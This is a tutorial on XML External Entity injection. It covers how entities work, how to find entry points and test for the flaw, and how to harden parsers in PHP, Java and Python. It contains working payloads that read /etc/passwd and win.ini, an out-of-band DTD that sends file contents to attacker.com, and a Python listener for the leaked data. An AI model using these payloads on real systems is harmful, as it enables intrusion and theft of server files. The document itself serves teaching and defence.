A Practical Dive into XML External Entity Injection
XML documents rely on a structured format that includes a declaration, an optional DTD (Document Type Definition), and the main data elements. The DTD allows the definition of entities, which act as placeholders that can expand to predefined values. When an entity references an external resource via the SYSTEM keyword, the XML parser may fetch and insert that resource’s content during processing.
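To see the placeholder behaviour in isolation, here is a minimal Python sketch using the standard library's xml.etree.ElementTree. It uses a harmless internal entity, so nothing is read from disk or the network. The entity name greeting, the constant DOC, and the helper expand_internal_entity are illustrative assumptions, not part of any real application.

```python
import xml.etree.ElementTree as ET

# Illustrative document: "greeting" is an internal entity declared in the DTD.
DOC = """<?xml version="1.0"?>
<!DOCTYPE demo [
  <!ENTITY greeting "hello from the DTD">
]>
<app><user>&greeting;</user></app>"""


def expand_internal_entity(xml_text: str) -> str:
    """Parse the document and return the text of <user> after entity expansion."""
    root = ET.fromstring(xml_text)
    return root.findtext("user")


if __name__ == "__main__":
    # The parser has already replaced &greeting; with the entity's value.
    print(expand_internal_entity(DOC))
```

An external entity is declared the same way, except that the replacement text comes from whatever the SYSTEM identifier points to.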
Consider a simple XML payload:
<?xml version="1.0"?>
<!DOCTYPE demo [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<app>
<user>&xxe;</user>
</app>
If the receiving application parses this XML without disabling external entity resolution, the parser will attempt to read the local file /etc/passwd and replace the &xxe; reference with its contents, which then might be reflected in the application’s response.
This behavior follows from the XML specification itself: it is less a programming error in the strict sense than a failure to restrict parser features. Modern libraries often provide safe defaults. For instance, libxml2 (the library behind PHP's XML extensions) stops loading external entities by default from version 2.9.0 onward, which covers functions like simplexml_load_string. However, developers may inadvertently re-enable dangerous features or use older library versions.
Crafting Attacks with DTDs
Attackers can declare entities inside the DTD block of the XML payload (internal DTD) or reference an externally hosted DTD file:
<!DOCTYPE data [
<!ENTITY % payload SYSTEM "http://attacker.com/evil.dtd">
%payload;
]>
External DTDs enable out-of-band exfiltration when direct output is not available. The attacker hosts a malicious DTD that defines an entity wrapping sensitive system data and sends it to the attacker’s server:
<!ENTITY % file SYSTEM "file:///etc/hostname">
<!ENTITY % eval "<!ENTITY &#x25; send SYSTEM 'http://attacker.com/?collect=%file;'>">
%eval;
%send;
The target parser follows the chain: it reads the local file into %file, constructs a dynamic entity send that includes the file content in a URL, and finally triggers send, generating an HTTP request that leaks the data.
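On the receiving side, the leaked value arrives as an ordinary query parameter. The following is a rough Python sketch of a listener for an authorized test, using only the standard library. The parameter name collect matches the DTD above; the names extract_collected, CallbackHandler, and make_listener, and the default port, are assumptions made for illustration.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import List
from urllib.parse import parse_qs, urlsplit


def extract_collected(request_path: str) -> List[str]:
    """Return the URL-decoded values of the 'collect' query parameter."""
    query = urlsplit(request_path).query
    return parse_qs(query, keep_blank_values=True).get("collect", [])


class CallbackHandler(BaseHTTPRequestHandler):
    """Logs any value delivered through ?collect=... and answers with 204."""

    def do_GET(self):
        for value in extract_collected(self.path):
            print(f"callback from {self.client_address[0]}: {value!r}")
        self.send_response(204)
        self.end_headers()

    def log_message(self, format, *args):
        # Suppress the default access log; do_GET prints what matters.
        pass


def make_listener(port: int = 8000) -> HTTPServer:
    """Create (but do not start) the listener; call serve_forever() to run it."""
    return HTTPServer(("0.0.0.0", port), CallbackHandler)
```

Calling make_listener().serve_forever() starts the server. Keeping the parsing in extract_collected makes it easy to check separately from the networking code.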
Identifying XXE Entry Points
Applications that accept XML input—whether in raw XML format, SOAP web services, or even hidden inside JSON or YAML structures—may process the XML with a vulnerable parser. Indicators include:
- SOAP endpoints with a Content-Type of text/xml or application/xml.
- Web services that accept user-defined XML payloads (e.g., REST APIs with an XML body).
- Any endpoint where XML appears within another encoding, like a base64-encoded string inside JSON. A common scenario is converting JSON to XML on the server side.
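The indicators above can be turned into a small triage helper. This Python sketch is a heuristic, not a complete detector: it flags XML content types and looks for JSON string values that are XML either directly or after base64 decoding. All function names are hypothetical, and the "starts with <" check is a deliberately crude assumption.

```python
import base64
import binascii
import json
from typing import List

XML_CONTENT_TYPES = {"text/xml", "application/xml"}


def is_xml_content_type(header_value: str) -> bool:
    """True for text/xml, application/xml, and any '+xml' media type."""
    media_type = header_value.split(";", 1)[0].strip().lower()
    return media_type in XML_CONTENT_TYPES or media_type.endswith("+xml")


def looks_like_xml(text: str) -> bool:
    # Crude heuristic: the first non-whitespace character opens a tag.
    return text.lstrip().startswith("<")


def find_embedded_xml(json_body: str) -> List[str]:
    """Return JSON string values that are XML, directly or after base64 decoding."""
    hits: List[str] = []

    def visit(node):
        if isinstance(node, dict):
            for value in node.values():
                visit(value)
        elif isinstance(node, list):
            for value in node:
                visit(value)
        elif isinstance(node, str):
            if looks_like_xml(node):
                hits.append(node)
                return
            try:
                decoded = base64.b64decode(node, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError, ValueError):
                return  # not base64 text, so nothing to inspect
            if looks_like_xml(decoded):
                hits.append(decoded)

    visit(json.loads(json_body))
    return hits
```

Any hit is only a candidate entry point; whether the server actually parses the value with a vulnerable configuration still has to be tested.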
Testing with a Practical Example
Assume a web application that echoes a name element:
<?xml version="1.0"?>
<data>
<name>guest</name>
</data>
The server responds with "Hello, guest". To test for XXE, submit:
<?xml version="1.0"?>
<!DOCTYPE test [
<!ENTITY probe SYSTEM "http://yourserver.test/check">
]>
<data>
<name>&probe;</name>
</data>
If the server makes a request to your domain, the parser supports external entities. Next, attempt file read by changing the entity to file:///C:/windows/win.ini (Windows) or file:///etc/passwd (Unix-like). A reflected file confirms the vulnerability.
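When testing several endpoints, it helps to tag each probe so that an incoming request can be matched to the document that caused it. The Python sketch below builds the probe document shown above with a random token in the path. The function name build_probe and the /check/<token> path layout are assumptions; yourserver.test stands in for a host you control.

```python
import uuid
from typing import Tuple


def build_probe(callback_base: str) -> Tuple[str, str]:
    """Return (token, xml_document) for a callback probe.

    The token is embedded in the SYSTEM identifier so that a request seen
    on the callback host can be correlated with this specific probe.
    """
    if '"' in callback_base:
        # System literals are not entity-escaped, so a quote cannot be encoded.
        raise ValueError("callback URL must not contain a double quote")
    token = uuid.uuid4().hex
    system_id = f"{callback_base.rstrip('/')}/check/{token}"
    document = (
        '<?xml version="1.0"?>\n'
        "<!DOCTYPE test [\n"
        f'<!ENTITY probe SYSTEM "{system_id}">\n'
        "]>\n"
        "<data>\n"
        "<name>&probe;</name>\n"
        "</data>"
    )
    return token, document
```

For example, token, doc = build_probe("http://yourserver.test") gives a document to submit and a token to look for in the callback host's request log.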
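For blind scenarios, employ an out-of-band technique with an external DTD as described above. Additionally, parameter entities, which are expanded inside the DTD rather than in the document body, can be used to bypass certain restrictions, for example when general entity references in the body are filtered or when the application validates the document structure before processing.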
Preventing XXE
The most reliable defense is to completely disable DTD processing and external entities in the XML parser. Configuration depends on the language and library. In PHP with DOMDocument, for example:
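$dom = new DOMDocument();
// Dangerous: LIBXML_NOENT substitutes entities and LIBXML_DTDLOAD loads the external DTD subset
// $dom->loadXML($xmlInput, LIBXML_NOENT | LIBXML_DTDLOAD);
// Better: leave those flags out and block network access
$dom->loadXML($xmlInput, LIBXML_NONET);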
For Java’s DocumentBuilderFactory, set:
DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
dbf.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
dbf.setFeature("http://xml.org/sax/features/external-general-entities", false);
dbf.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
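The same "reject any DOCTYPE" policy can be sketched in Python with the standard library alone. This is one possible approach under stated assumptions, not a canonical recipe: a first pass with xml.parsers.expat aborts as soon as a DOCTYPE declaration starts, and only then is the tree built. The names DoctypeForbidden and parse_untrusted are hypothetical.

```python
import xml.etree.ElementTree as ET
from xml.parsers import expat


class DoctypeForbidden(ValueError):
    """Raised when a document carries a DOCTYPE declaration."""


def _reject_doctype(name, system_id, public_id, has_internal_subset):
    # Called by expat at the start of a DOCTYPE, before any entity is declared.
    raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed")


def parse_untrusted(xml_bytes: bytes) -> ET.Element:
    """Parse XML from an untrusted source, refusing documents with a DTD."""
    # First pass: a bare expat parser whose only job is to abort on a DOCTYPE.
    scanner = expat.ParserCreate()
    scanner.StartDoctypeDeclHandler = _reject_doctype
    scanner.Parse(xml_bytes, True)
    # Second pass: build the tree now that no DTD is known to be present.
    return ET.fromstring(xml_bytes)
```

Parsing twice costs some time but keeps the policy check separate from tree construction. The third-party defusedxml package offers a similar policy as a maintained drop-in replacement for the standard parsers.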
Besides parser hardening, validate input against an XML schema (XSD) when the structure is known, and allowlist the protocols from which the parser may fetch resources. Avoid manual serialization/deserialization of XML where possible, and keep all XML libraries up to date.
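Where external resources cannot be disabled outright, a protocol allowlist can be expressed as a small check that a custom resolver consults before fetching anything. The Python sketch below shows only the check; the name is_allowed_resource and the choice of https as the sole permitted scheme are assumptions for illustration.

```python
from urllib.parse import urlsplit

# Assumption for this sketch: only HTTPS resources are ever legitimate.
ALLOWED_SCHEMES = frozenset({"https"})


def is_allowed_resource(uri: str, allowed=ALLOWED_SCHEMES) -> bool:
    """Return True only if the URI has an explicitly allowed scheme.

    URIs without a scheme are rejected too, since a relative reference
    could resolve against a file-based base URI.
    """
    scheme = urlsplit(uri).scheme.lower()
    return scheme in allowed
```

An allowlist is preferable to blocking file:// alone, because any scheme that is not named stays denied by default.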